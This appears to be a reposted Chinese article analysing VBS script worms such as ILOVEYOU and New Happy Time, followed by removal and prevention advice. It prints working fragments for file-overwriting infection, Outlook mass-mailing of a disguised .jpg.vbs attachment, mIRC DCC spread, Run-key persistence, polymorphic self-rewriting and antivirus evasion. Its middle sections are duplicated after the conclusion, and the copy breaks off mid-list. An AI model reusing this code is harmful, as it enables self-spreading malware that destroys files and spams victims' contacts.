VBS脚本病毒原理分析与防范
程序员文章站
2022-04-09 11:45:14
网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。当您收到一封主题为“i love you”的邮件,用兴奋得几乎快发抖的鼠标去点击附件的时...
网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。当您收到一封主题为“i love you”的邮件,用兴奋得几乎快发抖的鼠标去点击附件的时候;当您浏览一个信任的网站之后,发现打开每个文件夹的速度非常慢的时候,您是否察觉病毒已经闯进了您的世界呢?2000年5月4日欧美爆发的“爱虫”网络蠕虫病毒。由于通过电子邮件系统传播,爱虫病毒在短短几天内狂袭全球数百万计的电脑。微软、intel等在内的众多大型企业网络系统瘫痪,全球经济损失达几十亿美元。而去年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。
上面提及的两个病毒最大的一个共同特点是:使用vbscript编写。以爱虫和新欢乐时光病毒为典型代表的vbs脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。下面我们就来逐一对vbs脚本病毒的各个方面加以分析:
一、vbs脚本病毒的特点及发展现状
vbs病毒是用vb script编写而成,该脚本语言功能非常强大,它们利用windows系统的开放性特点,通过调用一些现成的windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用vbs实现时变得极其容易。vbs脚本病毒具有如下几个特点:
1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。
2.破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。
3.感染力强。由于脚本是直接解释执行,并且它不需要像pe病毒那样,需要做复杂的pe文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。
4.传播范围大。这类病毒通过htm文档,email附件或其它方式,可以在很短时间内传遍世界各地。
5.病毒源码容易被获取,变种多。由于vbs病毒解释执行,其源代码可读性非常强,即使病毒源码经过加密处理后,其源代码的获取还是比较简单。因此,这类病毒变种比较多,稍微改变一下病毒的结构,或者修改一下特征值,很多杀毒软件可能就无能为力。
6.欺骗性强。脚本病毒为了得到运行机会,往往会采用各种让用户不大注意的手段,譬如,邮件的附件名采用双后缀,如.jpg.vbs,由于系统默认不显示后缀,这样,用户看到这个文件的时候,就会认为它是一个jpg图片文件。
7.使得病毒生产机实现起来非常容易。所谓病毒生产机,就是可以按照用户的意愿,生产病毒的机器(当然,这里指的是程序),目前的病毒生产机,之所以大多数都为脚本病毒生产机,其中最重要的一点还是因为脚本是解释执行的,实现起来非常容易,具体将在我们后面谈及。
正因为以上几个特点,脚本病毒发展异常迅猛,特别是病毒生产机的出现,使得生成新型脚本病毒变得非常容易。
二、vbs脚本病毒原理分析
1.vbs脚本病毒如何感染、搜索文件
vbs脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而爱虫病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理:
以下是文件感染的部分关键代码:
set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件(即病毒本身)
vbscopy=self.readall ' 读取病毒全部代码到字符串变量vbscopy……
set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件,准备写入病毒代码
ap.write vbscopy ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.copy(目标文件.path & ".vbs") ' 创建另外一个病毒文件(以.vbs为后缀)
目标文件.delete(true) '删除目标文件
上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。
下面我们具体分析一下文件搜索代码:
'该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义,
on error resume next '如果出现错误,直接跳过,防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.getextensionname(file) '获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5,则进行感染。请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。
wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目录;递归调用
scan( )
scan(subfolder)
next
end sub
上面的代码就是vbs脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。
2.vbs脚本病毒通过网络传播的几种方式及代码分析
vbs脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,vbs脚本病毒采用如下几种方式进行传播:
1)通过email附件传播
这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索email地址。
下面我们具体分析一下vbs脚本病毒是如何做到这一点的:
function mailbroadcast()
on error resume next
wscript.echo
set outlookapp = createobject("outlook.application") //创建一个outlook应用的对象
if outlookapp= "outlook" then
set mapiobj=outlookapp.getnamespace("mapi") //获取mapi的名字空间
set addrlist= mapiobj.addresslists //获取地址表的个数
for each addr in addrlist
if addr.addressentries.count <> 0 then
addrentcount = addr.addressentries.count //获取每个地址表的email记录数
for addrentindex= 1 to addrentcount //遍历地址表的email地址
set item = outlookapp.createitem(0) //获取一个邮件对象实例
set addrent = addr.addressentries(addrentindex) //获取具体email地址
item.to = addrent.address //填入收信人地址 item.subject = "病毒传播实验" //写入邮件标题
item.body = "这里是病毒邮件传播测试,收到此信请不要慌张!" //写入文件内容
set attachments=item.attachments //定义邮件附件
attachments.add filesysobj.getspecialfolder(0) & "\test.jpg.vbs"
item.deleteaftersubmit = true //信件提交后自动删除
if item.to <> "" then
item.send //发送邮件
shellobj.regwrite "hkcu\software\mailtest\mailed", "1" //病毒标记,以免重复感染
end if
next
end if
next
end if
end function
2)通过局域网共享传播
局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说,为了局域网内交流方便,一定存在不少共享目录,并且具有可写权限,譬如win2000创建共享时,默认就是具有可写权限。这样病毒通过搜索这些共享目录,就可以将病毒代码传播到这些目录之中。
在vbs中,有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。我们利用该对象就可以达到传播的目的。
welcome_msg = "网络连接搜索测试"
set wshnetwork = wscript.createobject("wscript.network") '创建一个网络对象
set oprinters = wshnetwork.enumprinterconnections '创建一个网络打印机连接列表
wscript.echo "network printer mappings:"
for i = 0 to oprinters.count - 1 step 2 '显示网络打印机连接情况
wscript.echo "port " & oprinters.item(i) & " = " & oprinters.item(i+1)
next
set coldrives = wshnetwork.enumnetworkdrives '创建一个网络共享连接列表
if coldrives.count = 0 then
msgbox "没有可列出的驱动器。", vbinformation + vbokonly,welcome_msg
else
strmsg = "当前网络驱动器连接: " & crlf
for i = 0 to coldrives.count - 1 step 2
strmsg = strmsg & chr(13) & chr(10) & coldrives(i) & chr(9) & coldrives(i + 1)
next
msgbox strmsg, vbinformation + vbokonly, welcome_msg'显示当前网络驱动器连接
end if
上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后,我们就可以直接向目标驱动器读写文件了。
3)通过感染htm、asp、jsp、php等网页文件传播
如今,www服务已经变得非常普遍,病毒通过感染htm等文件,势必会导致所有访问过该网页的用户机器感染病毒。
病毒之所以能够在htm文件中发挥强大功能,采用了和绝大部分网页恶意代码相同的原理。基本上,它们采用了相同的代码,不过也可以采用其它代码,这段代码是病毒fso,wsh等对象能够在网页中运行的关键。在注册表hkey_classes_root\clsid\下我们可以找到这么一个主键{f935dc22-1cf0-11d0-adb9-00c04fd58a0b},注册表中对它他的说明是“windows script host shell object”,同样,我们也可以找到{0d43fe01-f093-11cf-8940-00a0c9054228},注册表对它的说明是“filesystem object”,一般先要对com进行初始化,在获取相应的组件对象之后,病毒便可正确地使用fso、wsh两个对象,调用它们的强大功能。代码如下所示:
set apple0bject = document.applets("kj_guest")
apple0bject.setclsid("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
apple0bject.createinstance() '创建一个实例
set wsshell apple0bject.get0bject()
apple0bject.setclsid("{0d43fe01-f093-11cf-8940-00a0c9054228}")
apple0bject.createinstance() '创建一个实例
set fso = apple0bject.get0bject()
对于其他类型文件,这里不再一一分析。
4)通过irc聊天通道传播
病毒通过irc传播一般来说采用以下代码(以mirc为例)
dim mirc
set fso=createobject("scripting.filesystemobject")
set mirc=fso.createtextfile("c:\mirc\script.ini") '创建文件script.ini
fso.copyfile wscript.scriptfullname, "c:\mirc\attachment.vbs", true '将病毒文件备份到attachment.vbs
mirc.writeline "[script]"
mirc.writeline "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick c:\mirc\attachment.vbs }"
'利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件
mirc.close
以上代码用来往script.ini文件中写入一行代码,实际中还会写入很多其他代码。script.ini中存放着用来控制irc会话的命令,这个文件里面的命令是可以自动执行的。譬如,“歌虫”病毒tune.vbs就会修改c:\mirc\script.ini 和 c:\mirc\mirc.ini,使每当irc用户使用被感染的通道时都会收到一份经由ddc发送的tune.vbs。同样,如果pirch98已安装在目标计算机的c:\pirch98目录下,病毒就会修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini,使每当irc用户使用被感染的通道时都会收到一份经由ddc发送的tune.vbs。
另外病毒也可以通过现在广泛流行的kazaa进行传播。病毒将病毒文件拷贝到kazaa的默认共享目录中,这样,当其他用户访问这台机器时,就有可能下载该病毒文件并执行。这种传播方法可能会随着kazaa这种点对点共享工具的流行而发生作用。
还有一些其他的传播方法,我们这里不再一一列举。
3.vbs脚本病毒如何获得控制权
如何获取控制权?这一个是一个比较有趣的话题,而vbs脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法:
1)修改注册表项
windows在启动的时候,会自动加载hkey_local_machine\software\microsoft\windows\currentversion\run项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序,这样就可以保证每次机器启动的时候拿到控制权。vbs修改贮册表的方法比较简单,直接调用下面语句即可。
wsh.regwrite(strname, anyvalue [,strtype])
2)通过映射文件执行方式
譬如,我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。
3)欺骗用户,让用户自己执行
这种方式其实和用户的心理有关。譬如,病毒在发送附件时,采用双后缀的文件名,由于默认情况下,后缀并不显示,举个例子,文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg,这时用户往往会把它当成一张图片去点击。同样,对于用户自己磁盘中的文件,病毒在感染它们的时候,将原有文件的文件名作为前缀,vbs作为后缀产生一个病毒文件,并删除原来文件,这样,用户就有可能将这个vbs文件看作自己原来的文件运行。
4)desktop.ini和folder.htt互相配合
这两个文件可以用来配置活动桌面,也可以用来自定义文件夹。如果用户的目录中含有这两个文件,当用户进入该目录时,就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt,还可能触发exe文件,这也可能成为病毒得到控制权的一种有效方法!
病毒获得控制权的方法还有很多,这方面作者发挥的余地也比较大。
4.vbs脚本病毒对抗反病毒软件的几种技巧
病毒要生存,对抗反病毒软件的能力也是必需的。一般来说,vbs脚本病毒采用如下几种对抗反病毒软件的方法:
1)自加密
譬如,新欢乐时光病毒,它可以随机选取密钥对自己的部分代码进行加密变换,使得每次感染的病毒代码都不一样,达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术,使得每次感染后的加密病毒的解密后的代码都不一样。
下面看一个简单的vbs脚本变形引擎(来自flyshadow)
randomize
set of = createobject("scripting.filesystemobject") '创建文件系统对象
vc = of.opentextfile(wscript.scriptfullname, 1).readall '读取自身代码
fs = array("of", "vc", "fs", "fsc") '定义一个即将被替换字符的数组
for fsc = 0 to 3
vc = replace(vc, fs(fsc), chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65))) '取4个随机字符替换数组fs中的字符串
next
of.opentextfile(wscript.scriptfullname, 2, 1).writeline vc '将替换后的代码写回文件
上面这段代码使得该vbs文件在每次运行后,其of,vc,fs,fsc四字符串都会用随机字符串来代替,这在很大程度上可以防止反病毒软件用特征值查毒法将其查出。
2)巧妙运用execute函数
用过vbs程序的朋友是否会觉得奇怪:当一个正常程序中用到了filesystemobject对象的时候,有些反病毒软件会在对这个程序进行扫描的时候报告说此vbs文件的风险为高,但是有些vbs脚本病毒同样采用了filesystemobject对象,为什么却又没有任何警告呢?原因很简单,就是因为这些病毒巧妙的运用了execute方法。有些杀毒软件检测vbs病毒时,会检查程序中是否声明使用了filesystemobject对象,如果采用了,这会发出报警。如果病毒将这段声明代码转化为字符串,然后通过execute(string)函数执行,就可以躲避某些反病毒软件。
3)改变某些对象的声明方法
譬如fso=createobject("scripting.filesystemobject"),我们将其改变为
fso=createobject("script"+"ing.filesyste"+"mobject"),这样反病毒软件对其进行静态扫描时就不会发现filesystemobject对象。
4)直接关闭反病毒软件
vbs脚本功能强大,它可以直接在搜索用户进程然后对进程名进行比较,如果发现是反病毒软件的进程就直接关闭,并对它的某些关键程序进行删除。
5.vbs病毒生产机的原理介绍
所谓病毒生产机就是指可以直接根据用户的选择产生病毒源代码的软件。在很多人看来这或许不可思议,其实对脚本病毒而言它的实现非常简单。
脚本语言是解释执行的、不需要编译,程序中不需要什么校验和定位,每条语句之间分隔得比较清楚。这样,先将病毒功能做成很多单独的模块,在用户做出病毒功能选择后,生产机只需要将相应的功能模块拼凑起来,最后再作相应的代码替换和优化即可。由于篇幅关系和其他原因,这里不作详细介绍。
三、如何防范vbs脚本病毒
1.如何从样本中提取(加密)脚本病毒
对于没有加密的脚本病毒,我们可以直接从病毒样本中找出来,现在介绍一下如何从病毒样本中提取加密vbs脚本病毒,这里我们以新欢乐时光为例。
用jediedit打开folder.htt。我们发现这个文件总共才93行,第一行<body onload="vbscript:kj_start()">,几行注释后,以<html>开始,</html>节尾。相信每个人都知道这是个什么类型的文件吧!
第87行到91行,是如下语句:
87:<script language=vbscript>
88:exestring = "afi fkseboa)eqiiqbtq)s^pqbtq)aadobapfdj)>mlibl^gb`p)cpk...;后面省略,很长!
89:execute("dim keyarr(3),thistext"&vbcrlf&"keyarr(0) = 3"&vbcrlf&"keyarr(1) = 3"&vbcrlf&"keyarr(2) = 3"&vbcrlf&"keyarr(3) = 4"&vbcrlf&"for i=1 to len(exestring)"&vbcrlf&"tempnum = asc(mid(exestring,i,1))"&vbcrlf&"if tempnum = 18 then"&vbcrlf&"tempnum = 34"&vbcrlf&"end if"&vbcrlf&"tempchar = chr(tempnum + keyarr(i mod 4))"&vbcrlf&"if tempchar = chr(28) then"&vbcrlf&"tempchar = vbcr"&vbcrlf&"elseif tempchar = chr(29) then"&vbcrlf&"tempchar = vblf"&vbcrlf&"end if"&vbcrlf&"thistext = thistext & tempchar"&vbcrlf&"next") 90:execute(thistext) 91:</script>
第87和91行不用解释了,第88行是一个字符串的赋值,很明显这是被加密过的病毒代码。看看89行最后的一段代码thistext = thistext & tempchar,再加上下面那一行,我们肯定能够猜到thistext里面放的是病毒解密代码(熟悉vbs的兄弟当然也可以分析一下这段解密代码,too simple!就算完全不看代码也应该可以看得出来的)。第90行是执行刚才thistext中的那段代码(经过解密处理后的代码)。
那么,下一步该怎么做呢?很简单,我们只要在病毒代码解密之后,将thistext的内容输出到一个文本文件就可以解决了。由于上面几行是vbscript,于是我创建了如下一个.txt文件:
首先,copy第88、89两行到刚才建立的.txt文件,当然如果你愿意看看新欢乐时光的执行效果,你也可以在最后输入第90行。然后在下面一行输入创建文件和将thistext写入文件vbs代码,整个文件如下所示:
exestring = "afi... ' 第88行代码 execute("dim keyar... ' 第89行代码
set fso=createobject("scripting.filesystemobject") ' 创建一个文件系统对象
set virusfile=fso.createtextfile("resource.log",true) ' 创建一个新文件resource.log,用以存放解密后的病毒代码 virusfile.writeline(thistext) ' 将解密后的代码写入resource.log
ok!就这么简单,保存文件,将该文件后缀名.txt改为.vbs(.vbe也可以),双击,你会发现该文件目录下多了一个文件resource.log,打开这个文件,怎么样?是不是“新欢乐时光”的源代码啊!
2.vbs脚本病毒的弱点
vbs脚本病毒由于其编写语言为脚本,因而它不会像pe文件那样方便灵活,它的运行是需要条件的(不过这种条件默认情况下就具备了)。笔者认为,vbs脚本病毒具有如下弱点:
1)绝大部分vbs脚本病毒运行的时候需要用到一个对象:filesystemobject
2)vbscript代码是通过windows script host来解释执行的。
3)vbs脚本病毒的运行需要其关联程序wscript.exe的支持。
4)通过网页传播的病毒需要activex的支持
5)通过email传播的病毒需要oe的自动发送邮件功能支持,但是绝大部分病毒都是以email为主要传播方式的。
3.如何预防和解除vbs脚本病毒
针对以上提到的vbs脚本病毒的弱点,笔者提出如下集中防范措施:
1)禁用文件系统对象filesystemobject
方法:用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。其中regsvr32是windows\system下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。
还有一种方法就是在注册表中hkey_classes_root\clsid\下找到一个主键{0d43fe01-f093-11cf-8940-00a0c9054228}的项,咔嚓即可。
2)卸载windows scripting host
在windows 98中(nt 4.0以上同理),打开[控制面板]→[添加/删除程序]→[windows安装程序]→[附件],取消“windows scripting host”一项。
和上面的方法一样,在注册表中hkey_classes_root\clsid\下找到一个主键{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}的项,咔嚓。
3)删除vbs、vbe、js、jse文件后缀名与应用程序的映射
点击[我的电脑]→[查看]→[文件夹选项]→[文件类型],然后删除vbs、vbe、js、jse文件后缀名与应用程序的映射。
4)在windows目录中,找到wscript.exe,更改名称或者删除,如果你觉得以后有机会用到的话,最好更改名称好了,当然以后也可以重新装上。
5)要彻底防治vbs网络蠕虫病毒,还需设置一下你的浏览器。我们首先打开浏览器,单击菜单栏里“internet 选项”安全选项卡里的[自定义级别]按钮。把“activex控件及插件”的一切设为禁用,这样就不怕了。呵呵,譬如新欢乐时光的那个activex组件如果不能运行,网络传播这项功能就玩完了。
6)禁止oe的自动收发邮件功能
7)由于蠕虫病毒大多利用文件扩展名作文章,所以要防范它就不要隐藏系统中已知文件类型的扩展名。windows默认的是“隐藏已知文件类型的扩展名称”,将其修改为显示所有文件类型的扩展名称。
8)将系统的网络连接的安全级别设置至少为“中等”,它可以在一定程度上预防某些有害的java程序或者某些activex组件对计算机的侵害。
9)呵呵,最后一项不说大家也应该知道了,杀毒软件确实很必要,尽管有些杀毒软件挺让广大用户失望,不过,选择是双方的哦。在这个病毒横飞的网络,如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。
四、对所有脚本类病毒发展的展望
随着网络的飞速发展,网络蠕虫病毒开始流行,而vbs脚本蠕虫则更加突出,不仅数量多,而且威力大。由于利用脚本编写病毒比较简单,除了将继续流行目前的vbs脚本病毒外,将会逐渐出现更多的其它脚本类病毒,譬如php,js,perl病毒等。
但是脚本并不是真正病毒技术爱好者编写病毒的最佳工具,并且脚本病毒解除起来比较容易、相对容易防范。笔者认为,脚本病毒仍将继续流行,但是能够具有像爱虫、新欢乐时光那样大影响的脚本蠕虫病毒只是少数。
上面提及的两个病毒最大的一个共同特点是:使用vbscript编写。以爱虫和新欢乐时光病毒为典型代表的vbs脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。下面我们就来逐一对vbs脚本病毒的各个方面加以分析:
一、vbs脚本病毒的特点及发展现状
vbs病毒是用vb script编写而成,该脚本语言功能非常强大,它们利用windows系统的开放性特点,通过调用一些现成的windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用vbs实现时变得极其容易。vbs脚本病毒具有如下几个特点:
1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。
2.破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。
3.感染力强。由于脚本是直接解释执行,并且它不需要像pe病毒那样,需要做复杂的pe文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。
4.传播范围大。这类病毒通过htm文档,email附件或其它方式,可以在很短时间内传遍世界各地。
5.病毒源码容易被获取,变种多。由于vbs病毒解释执行,其源代码可读性非常强,即使病毒源码经过加密处理后,其源代码的获取还是比较简单。因此,这类病毒变种比较多,稍微改变一下病毒的结构,或者修改一下特征值,很多杀毒软件可能就无能为力。
6.欺骗性强。脚本病毒为了得到运行机会,往往会采用各种让用户不大注意的手段,譬如,邮件的附件名采用双后缀,如.jpg.vbs,由于系统默认不显示后缀,这样,用户看到这个文件的时候,就会认为它是一个jpg图片文件。
7.使得病毒生产机实现起来非常容易。所谓病毒生产机,就是可以按照用户的意愿,生产病毒的机器(当然,这里指的是程序),目前的病毒生产机,之所以大多数都为脚本病毒生产机,其中最重要的一点还是因为脚本是解释执行的,实现起来非常容易,具体将在我们后面谈及。
正因为以上几个特点,脚本病毒发展异常迅猛,特别是病毒生产机的出现,使得生成新型脚本病毒变得非常容易。
二、vbs脚本病毒原理分析
1.vbs脚本病毒如何感染、搜索文件
vbs脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而爱虫病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理:
以下是文件感染的部分关键代码:
set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件(即病毒本身)
vbscopy=self.readall ' 读取病毒全部代码到字符串变量vbscopy……
set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件,准备写入病毒代码
ap.write vbscopy ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.copy(目标文件.path & ".vbs") ' 创建另外一个病毒文件(以.vbs为后缀)
目标文件.delete(true) '删除目标文件
上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。
下面我们具体分析一下文件搜索代码:
'该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义,
on error resume next '如果出现错误,直接跳过,防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.getextensionname(file) '获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5,则进行感染。请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。
wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目录;递归调用
scan( )
scan(subfolder)
next
end sub
上面的代码就是vbs脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。
2.vbs脚本病毒通过网络传播的几种方式及代码分析
vbs脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,vbs脚本病毒采用如下几种方式进行传播:
1)通过email附件传播
这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索email地址。
下面我们具体分析一下vbs脚本病毒是如何做到这一点的:
function mailbroadcast()
on error resume next
wscript.echo
set outlookapp = createobject("outlook.application") //创建一个outlook应用的对象
if outlookapp= "outlook" then
set mapiobj=outlookapp.getnamespace("mapi") //获取mapi的名字空间
set addrlist= mapiobj.addresslists //获取地址表的个数
for each addr in addrlist
if addr.addressentries.count <> 0 then
addrentcount = addr.addressentries.count //获取每个地址表的email记录数
for addrentindex= 1 to addrentcount //遍历地址表的email地址
set item = outlookapp.createitem(0) //获取一个邮件对象实例
set addrent = addr.addressentries(addrentindex) //获取具体email地址
item.to = addrent.address //填入收信人地址 item.subject = "病毒传播实验" //写入邮件标题
item.body = "这里是病毒邮件传播测试,收到此信请不要慌张!" //写入文件内容
set attachments=item.attachments //定义邮件附件
attachments.add filesysobj.getspecialfolder(0) & "\test.jpg.vbs"
item.deleteaftersubmit = true //信件提交后自动删除
if item.to <> "" then
item.send //发送邮件
shellobj.regwrite "hkcu\software\mailtest\mailed", "1" //病毒标记,以免重复感染
end if
next
end if
next
end if
end function
2)通过局域网共享传播
局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说,为了局域网内交流方便,一定存在不少共享目录,并且具有可写权限,譬如win2000创建共享时,默认就是具有可写权限。这样病毒通过搜索这些共享目录,就可以将病毒代码传播到这些目录之中。
在vbs中,有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。我们利用该对象就可以达到传播的目的。
welcome_msg = "网络连接搜索测试"
set wshnetwork = wscript.createobject("wscript.network") '创建一个网络对象
set oprinters = wshnetwork.enumprinterconnections '创建一个网络打印机连接列表
wscript.echo "network printer mappings:"
for i = 0 to oprinters.count - 1 step 2 '显示网络打印机连接情况
wscript.echo "port " & oprinters.item(i) & " = " & oprinters.item(i+1)
next
set coldrives = wshnetwork.enumnetworkdrives '创建一个网络共享连接列表
if coldrives.count = 0 then
msgbox "没有可列出的驱动器。", vbinformation + vbokonly,welcome_msg
else
strmsg = "当前网络驱动器连接: " & crlf
for i = 0 to coldrives.count - 1 step 2
strmsg = strmsg & chr(13) & chr(10) & coldrives(i) & chr(9) & coldrives(i + 1)
next
msgbox strmsg, vbinformation + vbokonly, welcome_msg'显示当前网络驱动器连接
end if
上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后,我们就可以直接向目标驱动器读写文件了。
3)通过感染htm、asp、jsp、php等网页文件传播
如今,www服务已经变得非常普遍,病毒通过感染htm等文件,势必会导致所有访问过该网页的用户机器感染病毒。
病毒之所以能够在htm文件中发挥强大功能,采用了和绝大部分网页恶意代码相同的原理。基本上,它们采用了相同的代码,不过也可以采用其它代码,这段代码是病毒fso,wsh等对象能够在网页中运行的关键。在注册表hkey_classes_root\clsid\下我们可以找到这么一个主键{f935dc22-1cf0-11d0-adb9-00c04fd58a0b},注册表中对它他的说明是“windows script host shell object”,同样,我们也可以找到{0d43fe01-f093-11cf-8940-00a0c9054228},注册表对它的说明是“filesystem object”,一般先要对com进行初始化,在获取相应的组件对象之后,病毒便可正确地使用fso、wsh两个对象,调用它们的强大功能。代码如下所示:
set apple0bject = document.applets("kj_guest")
apple0bject.setclsid("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
apple0bject.createinstance() '创建一个实例
set wsshell apple0bject.get0bject()
apple0bject.setclsid("{0d43fe01-f093-11cf-8940-00a0c9054228}")
apple0bject.createinstance() '创建一个实例
set fso = apple0bject.get0bject()
对于其他类型文件,这里不再一一分析。
4)通过irc聊天通道传播
病毒通过irc传播一般来说采用以下代码(以mirc为例)
dim mirc
set fso=createobject("scripting.filesystemobject")
set mirc=fso.createtextfile("c:\mirc\script.ini") '创建文件script.ini
fso.copyfile wscript.scriptfullname, "c:\mirc\attachment.vbs", true '将病毒文件备份到attachment.vbs
mirc.writeline "[script]"
mirc.writeline "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick c:\mirc\attachment.vbs }"
'利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件
mirc.close
以上代码用来往script.ini文件中写入一行代码,实际中还会写入很多其他代码。script.ini中存放着用来控制irc会话的命令,这个文件里面的命令是可以自动执行的。譬如,“歌虫”病毒tune.vbs就会修改c:\mirc\script.ini 和 c:\mirc\mirc.ini,使每当irc用户使用被感染的通道时都会收到一份经由ddc发送的tune.vbs。同样,如果pirch98已安装在目标计算机的c:\pirch98目录下,病毒就会修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini,使每当irc用户使用被感染的通道时都会收到一份经由ddc发送的tune.vbs。
另外病毒也可以通过现在广泛流行的kazaa进行传播。病毒将病毒文件拷贝到kazaa的默认共享目录中,这样,当其他用户访问这台机器时,就有可能下载该病毒文件并执行。这种传播方法可能会随着kazaa这种点对点共享工具的流行而发生作用。
还有一些其他的传播方法,我们这里不再一一列举。
3.vbs脚本病毒如何获得控制权
如何获取控制权?这一个是一个比较有趣的话题,而vbs脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法:
1)修改注册表项
windows在启动的时候,会自动加载hkey_local_machine\software\microsoft\windows\currentversion\run项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序,这样就可以保证每次机器启动的时候拿到控制权。vbs修改贮册表的方法比较简单,直接调用下面语句即可。
wsh.regwrite(strname, anyvalue [,strtype])
2)通过映射文件执行方式
譬如,我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。
3)欺骗用户,让用户自己执行
